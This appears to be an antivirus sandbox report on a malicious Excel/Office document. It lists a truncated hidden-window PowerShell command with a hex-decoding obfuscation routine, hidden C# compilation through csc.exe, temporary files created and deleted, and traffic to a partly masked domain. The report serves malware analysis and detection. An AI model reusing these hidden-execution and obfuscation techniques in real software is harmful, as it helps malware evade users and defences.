Technical Information
Malicious functions
Executes the following (exploit)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden function j2cdf8 {param($j31cac)$v762c19='e28d11';$pa273='';for ($i=0; $i -lt $j31cac.length;$i+=2){$af4a7aa=[convert]::ToByte($j31cac.Substring($i,2),16);$pa273+=[char]($a...
Modifies file system
Creates the following files
- %TEMP%\v08ymkgx.0.cs
- %TEMP%\res6247.tmp
- %TEMP%\csc6236.tmp
- %TEMP%\okmlvi0m.out
- %TEMP%\okmlvi0m.cmdline
- %TEMP%\okmlvi0m.0.cs
- %TEMP%\hz_thve_.dll
- %TEMP%\v08ymkgx.dll
- %TEMP%\evfjnn39.dll
- %TEMP%\res4c7d.tmp
- %TEMP%\res4c00.tmp
- %TEMP%\res4b92.tmp
- %TEMP%\akk9zhv7.dll
- %TEMP%\res4b06.tmp
- %TEMP%\okmlvi0m.dll
- %TEMP%\csc4c5d.tmp
- %TEMP%\csc4b82.tmp
- %TEMP%\csc4af5.tmp
- %TEMP%\hz_thve_.out
- %TEMP%\hz_thve_.cmdline
- %TEMP%\hz_thve_.0.cs
- %TEMP%\evfjnn39.out
- %TEMP%\evfjnn39.cmdline
- %TEMP%\evfjnn39.0.cs
- %TEMP%\akk9zhv7.out
- %TEMP%\akk9zhv7.cmdline
- %TEMP%\akk9zhv7.0.cs
- %TEMP%\v08ymkgx.out
- %TEMP%\v08ymkgx.cmdline
- %TEMP%\csc4bef.tmp
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.word\~wrf{04df3b2e-1a08-470a-ac9f-f7fd3ab81b25}.tmp
Deletes the following files
- %TEMP%\res4b06.tmp
- %TEMP%\v08ymkgx.pdb
- %TEMP%\v08ymkgx.cmdline
- %TEMP%\res4c00.tmp
- %TEMP%\csc4bef.tmp
- %TEMP%\hz_thve_.cmdline
- %TEMP%\hz_thve_.dll
- %TEMP%\hz_thve_.out
- %TEMP%\okmlvi0m.cmdline
- %TEMP%\hz_thve_.0.cs
- %TEMP%\res6247.tmp
- %TEMP%\csc6236.tmp
- %TEMP%\okmlvi0m.dll
- %TEMP%\okmlvi0m.pdb
- %TEMP%\okmlvi0m.out
- %TEMP%\v08ymkgx.out
- %TEMP%\hz_thve_.pdb
- %TEMP%\v08ymkgx.dll
- %TEMP%\akk9zhv7.0.cs
- %TEMP%\csc4af5.tmp
- %TEMP%\res4b92.tmp
- %TEMP%\csc4b82.tmp
- %TEMP%\akk9zhv7.cmdline
- %TEMP%\akk9zhv7.out
- %TEMP%\akk9zhv7.dll
- %TEMP%\akk9zhv7.pdb
- %TEMP%\csc4c5d.tmp
- %TEMP%\evfjnn39.out
- %TEMP%\evfjnn39.cmdline
- %TEMP%\evfjnn39.dll
- %TEMP%\evfjnn39.pdb
- %TEMP%\evfjnn39.0.cs
- %TEMP%\res4c7d.tmp
- %TEMP%\v08ymkgx.0.cs
- %TEMP%\okmlvi0m.0.cs
Network activity
TCP
- 'va###omat.xyz':443
UDP
- DNS ASK va###omat.xyz
Miscellaneous
Creates and executes the following
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden function j2cdf8 {param($j31cac)$v762c19='e28d11';$pa273='';for ($i=0; $i -lt $j31cac.length;$i+=2){$af4a7aa=[convert]::ToByte($j31cac.Substring($i,2),16);$pa273+=[char]($a...' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\v08ymkgx.cmdline"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\akk9zhv7.cmdline"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\evfjnn39.cmdline"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\hz_thve_.cmdline"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES4B06.tmp" "%TEMP%\CSC4AF5.tmp"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES4B92.tmp" "%TEMP%\CSC4B82.tmp"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES4C00.tmp" "%TEMP%\CSC4BEF.tmp"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES4C7D.tmp" "%TEMP%\CSC4C5D.tmp"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\okmlvi0m.cmdline"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES6247.tmp" "%TEMP%\CSC6236.tmp"' (with hidden window)
Executes the following
- '%ProgramFiles%\microsoft office\office14\excel.exe' -Embedding
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\v08ymkgx.cmdline"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\akk9zhv7.cmdline"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\evfjnn39.cmdline"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\hz_thve_.cmdline"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES4B06.tmp" "%TEMP%\CSC4AF5.tmp"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES4B92.tmp" "%TEMP%\CSC4B82.tmp"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES4C00.tmp" "%TEMP%\CSC4BEF.tmp"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES4C7D.tmp" "%TEMP%\CSC4C5D.tmp"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\okmlvi0m.cmdline"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES6247.tmp" "%TEMP%\CSC6236.tmp"
- '%ProgramFiles%\microsoft office\office14\excelcnv.exe' -Embedding
